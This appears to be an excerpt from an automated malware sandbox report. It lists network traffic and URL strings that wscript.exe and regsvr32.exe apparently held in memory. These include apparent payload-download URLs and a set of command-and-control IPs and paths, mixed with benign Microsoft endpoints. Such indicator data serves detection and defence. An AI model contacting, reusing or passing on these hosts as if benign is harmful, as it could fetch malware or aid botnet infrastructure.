Source: global traffic	TCP traffic: 192.168.2.7:49727 -> 72.15.201.15:8080
Source: global traffic	TCP traffic: 192.168.2.7:49728 -> 1.234.2.232:8080
Source: global traffic	TCP traffic: 192.168.2.7:49729 -> 82.223.21.224:8080
Source: global traffic	TCP traffic: 192.168.2.7:49730 -> 206.189.28.199:8080
Source: global traffic	TCP traffic: 192.168.2.7:49731 -> 169.57.156.166:8080
Source: global traffic	TCP traffic: 192.168.2.7:49732 -> 107.170.39.149:8080
Source: global traffic	TCP traffic: 192.168.2.7:49737 -> 91.207.28.33:8080

Source: unknown

Network traffic detected: IP country count 17

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 167.172.199.165
Source: unknown	TCP traffic detected without corresponding DNS query: 167.172.199.165
Source: unknown	TCP traffic detected without corresponding DNS query: 167.172.199.165
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65

Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: wscript.exe, 0000000A.00000003.345684098.00000000058D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.348228525.00000000058EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345758106.00000000058EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341314340.00000000058D3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462973550.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.816817308.0000000000E22000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462370814.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462587375.0000000000E23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 0000000D.00000003.462671669.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.816434632.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462908363.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462370814.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462587375.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.13.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462908363.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462370814.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462587375.0000000000E23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab35Hq
Source: regsvr32.exe, 0000000D.00000003.462898342.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.401238189.0000000000E78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9aa541ead3e54
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: wscript.exe, wscript.exe, 0000000A.00000003.330462855.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335756850.0000000005709000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334389573.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333860223.0000000005638000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341212440.000000000588F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333925882.0000000005658000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333542268.00000000055E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329822485.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330213444.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330343076.00000000054EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338605530.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325763800.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326506362.000000000539A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347654351.0000000005650000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333969896.0000000005628000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324507207.00000000053AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ozmeydan.com/cekici/9/
Source: wscript.exe, 0000000A.00000003.340717850.00000000050D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ozmeydan.com/cekici/9/xM
Source: wscript.exe, 0000000A.00000003.333860223.0000000005638000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333322944.0000000005606000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333584044.0000000005623000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347587677.000000000564C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333494137.000000000560D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335128897.000000000564C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://softwareulike.com/cW4
Source: wscript.exe, wscript.exe, 0000000A.00000003.330462855.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335756850.0000000005709000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334389573.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333860223.0000000005638000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341212440.000000000588F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333925882.0000000005658000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333542268.00000000055E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329822485.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330213444.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330343076.00000000054EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338605530.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325763800.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326506362.000000000539A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347654351.0000000005650000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333969896.0000000005628000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324507207.00000000053AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://softwareulike.com/cWIYxWMPkK/
Source: wscript.exe, 0000000A.00000003.340717850.00000000050D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://softwareulike.com/cWIYxWMPkK/yM
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: wscript.exe, 0000000A.00000003.332677466.00000000053BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wrappixels.com
Source: wscript.exe, wscript.exe, 0000000A.00000003.330462855.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335756850.0000000005709000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334389573.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333860223.0000000005638000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341212440.000000000588F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333925882.0000000005658000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333542268.00000000055E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329822485.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330213444.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330343076.00000000054EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338605530.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325763800.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326506362.000000000539A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347654351.0000000005650000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333969896.0000000005628000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324507207.00000000053AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
Source: wscript.exe, 0000000A.00000003.340717850.00000000050CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0
Source: wscript.exe, 0000000A.00000003.340717850.00000000050D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://1.234.2.232:8080/k
Source: regsvr32.exe, 0000000D.00000002.816434632.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://1.3.239.212.5/
Source: regsvr32.exe, 0000000D.00000002.816434632.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://10.207.28.33:8080/
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://103.43.75.120/
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://103.43.75.120/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://103.43.75.120/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/F
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://103.43.75.120:443/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/
Source: regsvr32.exe, 0000000D.00000002.816987046.0000000000E78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://149.56.131.28:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/
Source: regsvr32.exe, 0000000D.00000002.817123962.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://163.44.196.120:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://164.90.222.65/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/
Source: regsvr32.exe, 0000000D.00000003.462908363.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.172.199.165:8080/
Source: regsvr32.exe, 0000000D.00000003.462908363.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.172.199.165:8080//dslbwuw/s
Source: regsvr32.exe, 0000000D.00000003.462908363.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.172.199.165:8080/bwuw/
Source: regsvr32.exe, 0000000D.00000003.462908363.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.172.199.165:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/
Source: regsvr32.exe, 0000000D.00000003.462908363.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.172.199.165:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/c
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://169.57.156.166:8080/llw/
Source: regsvr32.exe, 0000000D.00000002.817123962.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://169.57.156.166:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://169.57.156.166:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/~
Source: regsvr32.exe, 0000000D.00000003.462908363.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462370814.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462587375.0000000000E23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://182.162.143.56/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/?
Source: regsvr32.exe, 0000000D.00000003.462908363.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://182.162.143.56:443/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/y0
Source: regsvr32.exe, 0000000D.00000003.462908363.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462370814.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462587375.0000000000E23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://187.63.160.88:80/
Source: regsvr32.exe, 0000000D.00000003.462908363.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462370814.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462587375.0000000000E23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://187.63.160.88:80/g
Source: regsvr32.exe, 0000000D.00000003.462908363.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462370814.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462587375.0000000000E23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://187.63.160.88:80/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://206.189.28.199:8080/
Source: regsvr32.exe, 0000000D.00000002.817123962.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://206.189.28.199:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/
Source: regsvr32.exe, 0000000D.00000002.817123962.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://206.189.28.199:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/0
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://213.239.212.5/
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://213.239.212.5/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://213.239.212.5/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/W
Source: regsvr32.exe, 0000000D.00000002.817123962.0000000002DB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://213.239.212.5/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/u
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://213.239.212.5/wn
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://213.239.212.5:443/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/
Source: regsvr32.exe, 0000000D.00000003.462908363.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462370814.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462587375.0000000000E23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://66.228.32.31:7080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://82.223.21.224:8080/
Source: regsvr32.exe, 0000000D.00000002.816093001.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://91.121.146.47:8080/
Source: regsvr32.exe, 0000000D.00000002.816093001.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://91.121.146.47:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://91.207.28.33:8080/
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://91.207.28.33:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://91.207.28.33:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw//
Source: regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://91.207.28.33:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/g
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.aadrm.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://api.cortana.ai
